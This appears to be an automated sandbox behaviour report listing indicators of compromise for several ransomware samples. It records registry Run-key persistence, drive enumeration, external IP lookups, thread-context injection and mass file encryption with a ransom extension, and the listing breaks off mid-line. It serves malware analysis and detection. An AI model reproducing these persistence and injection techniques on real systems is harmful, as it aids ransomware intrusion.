description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\5198ff1b-df14-4fbf-b4e5-7d3b448b8b11\\Trojan-Ransom.Win32.Stop.ln-c68ff2b64fe8310e584f0680e62c1283df48af9d09be486feaa820b57090e79c.exe\" --AutoStart" Trojan-Ransom.Win32.Stop.ln-c68ff2b64fe8310e584f0680e62c1283df48af9d09be486feaa820b57090e79c.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" Trojan-Ransom.Win32.Blocker.mmug-b008c96b1ba6c13c4e922202baad57e199d9dee32a97a1443548c8a0ca303492.exe Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\None = "C:\\Users\\Admin\\AppData\\Roaming\\invoice" HPXmmgLUSavYuccxma5.exe Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\hinjfcglyzt = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\bzxjlj.exe\"" Trojan-Ransom.Win32.GandCrypt.jcc-45a2cc9060b21404632f07ee468d105ccd42075feb680f00d3aa1c20a19d272a.exe Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\pkommgwfuhq = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\yiqpya.exe\"" Trojan-Ransom.Win32.GandCrypt.jdv-0d641a6e15a1b393fa49c6c2e98ada6e7a04a9163667f667d3776786515d0991.exe Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\huatobssgsh = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\wnkoag.exe\"" Trojan-Ransom.Win32.GandCrypt.jes-79967e1aba8d8bd41f5fa97871f496ff3d7dcaf66d879d0134c6f9d056010697.exe Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\nxlzfuoygnn = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\ekziuk.exe\"" UDS-Trojan-Ransom.Win32.GandCrypt.a-ecffab4f2c602dc448fc660d951c597bece58b709d98ee6ff03c3010473ffeee.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe = "C:\\Windows\\System32\\Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe" Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe -
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Drops desktop.ini file(s) 4 IoCs
description ioc Process File opened for modification C:\Program Files\desktop.ini Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File opened for modification C:\$Recycle.Bin\S-1-5-21-4050598569-1597076380-177084960-1000\desktop.ini Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-4050598569-1597076380-177084960-1000\desktop.ini Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\I: UDS-Trojan-Ransom.Win32.GandCrypt.a-ecffab4f2c602dc448fc660d951c597bece58b709d98ee6ff03c3010473ffeee.exe File opened (read-only) \??\R: HEUR-Trojan-Ransom.Win32.Encoder.gen-e9e23726b4a7451ba5eefc9ec90c1ea897046bde4ed13de419d9dace59f6dabc.exe File opened (read-only) \??\V: HEUR-Trojan-Ransom.Win32.Encoder.gen-e9e23726b4a7451ba5eefc9ec90c1ea897046bde4ed13de419d9dace59f6dabc.exe File opened (read-only) \??\X: HEUR-Trojan-Ransom.Win32.Encoder.gen-e9e23726b4a7451ba5eefc9ec90c1ea897046bde4ed13de419d9dace59f6dabc.exe File opened (read-only) \??\Y: HEUR-Trojan-Ransom.Win32.Encoder.gen-e9e23726b4a7451ba5eefc9ec90c1ea897046bde4ed13de419d9dace59f6dabc.exe File opened (read-only) \??\L: UDS-Trojan-Ransom.Win32.GandCrypt.a-ecffab4f2c602dc448fc660d951c597bece58b709d98ee6ff03c3010473ffeee.exe File opened (read-only) \??\I: HEUR-Trojan-Ransom.Win32.Encoder.gen-e9e23726b4a7451ba5eefc9ec90c1ea897046bde4ed13de419d9dace59f6dabc.exe File opened (read-only) \??\P: HEUR-Trojan-Ransom.Win32.Encoder.gen-e9e23726b4a7451ba5eefc9ec90c1ea897046bde4ed13de419d9dace59f6dabc.exe File opened (read-only) \??\J: UDS-Trojan-Ransom.Win32.GandCrypt.a-ecffab4f2c602dc448fc660d951c597bece58b709d98ee6ff03c3010473ffeee.exe File opened (read-only) \??\K: UDS-Trojan-Ransom.Win32.GandCrypt.a-ecffab4f2c602dc448fc660d951c597bece58b709d98ee6ff03c3010473ffeee.exe File opened (read-only) \??\P: UDS-Trojan-Ransom.Win32.GandCrypt.a-ecffab4f2c602dc448fc660d951c597bece58b709d98ee6ff03c3010473ffeee.exe File opened (read-only) \??\T: UDS-Trojan-Ransom.Win32.GandCrypt.a-ecffab4f2c602dc448fc660d951c597bece58b709d98ee6ff03c3010473ffeee.exe File opened (read-only) \??\O: HEUR-Trojan-Ransom.Win32.Encoder.gen-e9e23726b4a7451ba5eefc9ec90c1ea897046bde4ed13de419d9dace59f6dabc.exe File opened (read-only) \??\W: HEUR-Trojan-Ransom.Win32.Encoder.gen-e9e23726b4a7451ba5eefc9ec90c1ea897046bde4ed13de419d9dace59f6dabc.exe File opened (read-only) \??\Z: HEUR-Trojan-Ransom.Win32.Encoder.gen-e9e23726b4a7451ba5eefc9ec90c1ea897046bde4ed13de419d9dace59f6dabc.exe File opened (read-only) \??\M: UDS-Trojan-Ransom.Win32.GandCrypt.a-ecffab4f2c602dc448fc660d951c597bece58b709d98ee6ff03c3010473ffeee.exe File opened (read-only) \??\G: UDS-Trojan-Ransom.Win32.GandCrypt.a-ecffab4f2c602dc448fc660d951c597bece58b709d98ee6ff03c3010473ffeee.exe File opened (read-only) \??\S: UDS-Trojan-Ransom.Win32.GandCrypt.a-ecffab4f2c602dc448fc660d951c597bece58b709d98ee6ff03c3010473ffeee.exe File opened (read-only) \??\U: UDS-Trojan-Ransom.Win32.GandCrypt.a-ecffab4f2c602dc448fc660d951c597bece58b709d98ee6ff03c3010473ffeee.exe File opened (read-only) \??\Z: UDS-Trojan-Ransom.Win32.GandCrypt.a-ecffab4f2c602dc448fc660d951c597bece58b709d98ee6ff03c3010473ffeee.exe File opened (read-only) \??\K: HEUR-Trojan-Ransom.Win32.Encoder.gen-e9e23726b4a7451ba5eefc9ec90c1ea897046bde4ed13de419d9dace59f6dabc.exe File opened (read-only) \??\N: HEUR-Trojan-Ransom.Win32.Encoder.gen-e9e23726b4a7451ba5eefc9ec90c1ea897046bde4ed13de419d9dace59f6dabc.exe File opened (read-only) \??\Q: HEUR-Trojan-Ransom.Win32.Encoder.gen-e9e23726b4a7451ba5eefc9ec90c1ea897046bde4ed13de419d9dace59f6dabc.exe File opened (read-only) \??\T: HEUR-Trojan-Ransom.Win32.Encoder.gen-e9e23726b4a7451ba5eefc9ec90c1ea897046bde4ed13de419d9dace59f6dabc.exe File opened (read-only) \??\A: HEUR-Trojan-Ransom.Win32.Encoder.gen-e9e23726b4a7451ba5eefc9ec90c1ea897046bde4ed13de419d9dace59f6dabc.exe File opened (read-only) \??\M: HEUR-Trojan-Ransom.Win32.Encoder.gen-e9e23726b4a7451ba5eefc9ec90c1ea897046bde4ed13de419d9dace59f6dabc.exe File opened (read-only) \??\V: UDS-Trojan-Ransom.Win32.GandCrypt.a-ecffab4f2c602dc448fc660d951c597bece58b709d98ee6ff03c3010473ffeee.exe File opened (read-only) \??\X: UDS-Trojan-Ransom.Win32.GandCrypt.a-ecffab4f2c602dc448fc660d951c597bece58b709d98ee6ff03c3010473ffeee.exe File opened (read-only) \??\N: UDS-Trojan-Ransom.Win32.GandCrypt.a-ecffab4f2c602dc448fc660d951c597bece58b709d98ee6ff03c3010473ffeee.exe File opened (read-only) \??\B: HEUR-Trojan-Ransom.Win32.Encoder.gen-e9e23726b4a7451ba5eefc9ec90c1ea897046bde4ed13de419d9dace59f6dabc.exe File opened (read-only) \??\E: HEUR-Trojan-Ransom.Win32.Encoder.gen-e9e23726b4a7451ba5eefc9ec90c1ea897046bde4ed13de419d9dace59f6dabc.exe File opened (read-only) \??\J: HEUR-Trojan-Ransom.Win32.Encoder.gen-e9e23726b4a7451ba5eefc9ec90c1ea897046bde4ed13de419d9dace59f6dabc.exe File opened (read-only) \??\E: UDS-Trojan-Ransom.Win32.GandCrypt.a-ecffab4f2c602dc448fc660d951c597bece58b709d98ee6ff03c3010473ffeee.exe File opened (read-only) \??\Q: UDS-Trojan-Ransom.Win32.GandCrypt.a-ecffab4f2c602dc448fc660d951c597bece58b709d98ee6ff03c3010473ffeee.exe File opened (read-only) \??\A: UDS-Trojan-Ransom.Win32.GandCrypt.a-ecffab4f2c602dc448fc660d951c597bece58b709d98ee6ff03c3010473ffeee.exe File opened (read-only) \??\B: UDS-Trojan-Ransom.Win32.GandCrypt.a-ecffab4f2c602dc448fc660d951c597bece58b709d98ee6ff03c3010473ffeee.exe File opened (read-only) \??\H: UDS-Trojan-Ransom.Win32.GandCrypt.a-ecffab4f2c602dc448fc660d951c597bece58b709d98ee6ff03c3010473ffeee.exe File opened (read-only) \??\O: UDS-Trojan-Ransom.Win32.GandCrypt.a-ecffab4f2c602dc448fc660d951c597bece58b709d98ee6ff03c3010473ffeee.exe File opened (read-only) \??\U: HEUR-Trojan-Ransom.Win32.Encoder.gen-e9e23726b4a7451ba5eefc9ec90c1ea897046bde4ed13de419d9dace59f6dabc.exe File opened (read-only) \??\R: UDS-Trojan-Ransom.Win32.GandCrypt.a-ecffab4f2c602dc448fc660d951c597bece58b709d98ee6ff03c3010473ffeee.exe File opened (read-only) \??\W: UDS-Trojan-Ransom.Win32.GandCrypt.a-ecffab4f2c602dc448fc660d951c597bece58b709d98ee6ff03c3010473ffeee.exe File opened (read-only) \??\Y: UDS-Trojan-Ransom.Win32.GandCrypt.a-ecffab4f2c602dc448fc660d951c597bece58b709d98ee6ff03c3010473ffeee.exe File opened (read-only) \??\G: HEUR-Trojan-Ransom.Win32.Encoder.gen-e9e23726b4a7451ba5eefc9ec90c1ea897046bde4ed13de419d9dace59f6dabc.exe File opened (read-only) \??\H: HEUR-Trojan-Ransom.Win32.Encoder.gen-e9e23726b4a7451ba5eefc9ec90c1ea897046bde4ed13de419d9dace59f6dabc.exe File opened (read-only) \??\L: HEUR-Trojan-Ransom.Win32.Encoder.gen-e9e23726b4a7451ba5eefc9ec90c1ea897046bde4ed13de419d9dace59f6dabc.exe File opened (read-only) \??\S: HEUR-Trojan-Ransom.Win32.Encoder.gen-e9e23726b4a7451ba5eefc9ec90c1ea897046bde4ed13de419d9dace59f6dabc.exe -
Looks up external IP address via web service 12 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 321 api.2ip.ua 604 bot.whatismyipaddress.com 738 api.2ip.ua 806 api.2ip.ua 1502 api.2ip.ua 2736 api.ipify.org 242 api.2ip.ua 243 api.2ip.ua 1364 api.2ip.ua 2731 api.ipify.org 452 api.2ip.ua 912 bot.whatismyipaddress.com -
Drops file in System32 directory 5 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE bmlplan.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies bmlplan.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 bmlplan.exe File created C:\Windows\System32\Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 bmlplan.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 1836 set thread context of 5656 1836 HEUR-Trojan-Ransom.Win32.Gen.gen-70cb325da7e54f302dd59c22effc1cb651f270c72b1323fda2331c6acf07dca8.exe 166 PID 380 set thread context of 5676 380 HPXmmgLUSavYuccxma5.exe 168 PID 4300 set thread context of 4416 4300 Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe 180 -
resource yara_rule behavioral1/memory/2272-103-0x0000000000400000-0x0000000000424000-memory.dmp upx behavioral1/files/0x000b000000023ba4-105.dat upx behavioral1/memory/2272-263-0x0000000000400000-0x0000000000424000-memory.dmp upx behavioral1/memory/2636-871-0x0000000000400000-0x0000000000434000-memory.dmp upx behavioral1/files/0x0008000000023bcd-868.dat upx behavioral1/files/0x0007000000023da8-18247.dat upx behavioral1/memory/11588-18617-0x0000000000400000-0x000000000051F000-memory.dmp upx behavioral1/memory/7788-20567-0x0000000000400000-0x000000000051F000-memory.dmp upx behavioral1/memory/11588-22878-0x0000000000400000-0x000000000051F000-memory.dmp upx behavioral1/memory/7788-26110-0x0000000000400000-0x000000000051F000-memory.dmp upx behavioral1/memory/11588-26586-0x0000000000400000-0x000000000051F000-memory.dmp upx behavioral1/memory/7788-26617-0x0000000000400000-0x000000000051F000-memory.dmp upx -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ja-JP\TipRes.dll.mui Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Collections.NonGeneric.dll Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Reflection.Emit.dll.id-38D4324C.[[email protected]].money Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File created C:\Program Files\Microsoft Office\root\Office16\MEDIA\BOMB.WAV.id-38D4324C.[[email protected]].money Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Threading.Tasks.Parallel.dll Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.contrast-black_scale-180.png Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File created C:\Program Files\Microsoft Office\root\Templates\1033\Training.potx.id-38D4324C.[[email protected]].money Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\api-ms-win-core-file-l2-1-0.dll.id-38D4324C.[[email protected]].money Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.sr-latn-rs.dll Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\hr-HR\tipresx.dll.mui Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File created C:\Program Files\Java\jdk-1.8\jre\legal\jdk\bcel.md.id-38D4324C.[[email protected]].money Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Private.Uri.dll.id-38D4324C.[[email protected]].money Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\Bibliography\Style\GostTitle.XSL.id-38D4324C.[[email protected]].money Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.Security.dll Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File created C:\Program Files\Java\jre-1.8\legal\jdk\zlib.md.id-38D4324C.[[email protected]].money Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Diagnostics.Debug.dll Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL110.XML Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File created C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-linkedentity.png.id-38D4324C.[[email protected]].money Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\Microsoft.Win32.Registry.dll Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BLUEPRNT\THMBNAIL.PNG.id-38D4324C.[[email protected]].money Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\clrgc.dll.id-38D4324C.[[email protected]].money Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL117.XML.id-38D4324C.[[email protected]].money Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File opened for modification C:\Program Files\PushUninstall.M2T HEUR-Trojan-Ransom.Win32.Encoder.gen-e9e23726b4a7451ba5eefc9ec90c1ea897046bde4ed13de419d9dace59f6dabc.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ipsdeu.xml Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\[email protected] Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\images\cursors\win32_LinkDrop32x32.gif Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File created C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml.id-38D4324C.[[email protected]].money Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Net.Ping.dll.id-38D4324C.[[email protected]].money Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\Send2.16.GrayF.png.id-38D4324C.[[email protected]].money Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\msjet.xsl.id-38D4324C.[[email protected]].money Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File created C:\Program Files\7-Zip\Lang\tr.txt.id-38D4324C.[[email protected]].money Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.ro-ro.dll Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Net.Requests.dll Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File created C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected].[[email protected]].money Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File created C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected].[[email protected]].money Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected] Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-flag.png.id-38D4324C.[[email protected]].money Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File opened for modification C:\Program Files\7-Zip\Lang\de.txt Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\api-ms-win-crt-locale-l1-1-0.dll.id-38D4324C.[[email protected]].money Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File created C:\Program Files\7-Zip\Lang\th.txt.id-38D4324C.[[email protected]].money Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File opened for modification C:\Program Files\Common Files\System\msadc\de-DE\msdaremr.dll.mui Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Net.WebClient.dll.id-38D4324C.[[email protected]].money Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Reflection.Metadata.dll.id-38D4324C.[[email protected]].money Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogoSmall.scale-100.png.id-38D4324C.[[email protected]].money Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Security.Cryptography.OpenSsl.dll.id-38D4324C.[[email protected]].money Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File created C:\Program Files\7-Zip\Lang\mng2.txt.id-38D4324C.[[email protected]].money Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File opened for modification C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml.id-38D4324C.[[email protected]].money Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\WordInterProviderRanker.bin.id-38D4324C.[[email protected]].money Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File created C:\Program Files\Microsoft Office\root\rsod\osm.x-none.msi.16.x-none.tree.dat.id-38D4324C.[[email protected]].money Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Reflection.TypeExtensions.dll Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File created C:\Program Files\Microsoft Office\root\Office16\SAMPLES\SOLVSAMP.XLS.id-38D4324C.[[email protected]].money Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected] Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\as90.xsl.id-38D4324C.[[email protected]].money Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File opened for modification C:\Program Files\EnableStart.xla HEUR-Trojan-Ransom.Win32.Encoder.gen-e9e23726b4a7451ba5eefc9ec90c1ea897046bde4ed13de419d9dace59f6dabc.exe File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\Microsoft.NETCore.App.deps.json.id-38D4324C.[[email protected]].money Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RADIAL\THMBNAIL.PNG.id-38D4324C.[[email protected]].money Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\cs\PresentationCore.resources.dll Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File opened for modification C:\Program Files\7-Zip\Lang\lt.txt Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\fr-FR\oledb32r.dll.mui Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File opened for modification C:\Program Files\Microsoft Office\root\fre\StartMenu_Win10_RTL.mp4 Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File opened for modification C:\Program Files\Microsoft Office\root\Integration\C2RManifest.officemuiset.msi.16.en-us.xml.id-38D4324C.[[email protected]].money Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.IO.Compression.dll.id-38D4324C.[[email protected]].money Trojan-Ransom.Win32.Crusis.drf-b487fe8e47700d12c942141d1c0776e8e2521640717b062bc434702d72ad92b4.exe File created C:\Program Files\Microsoft 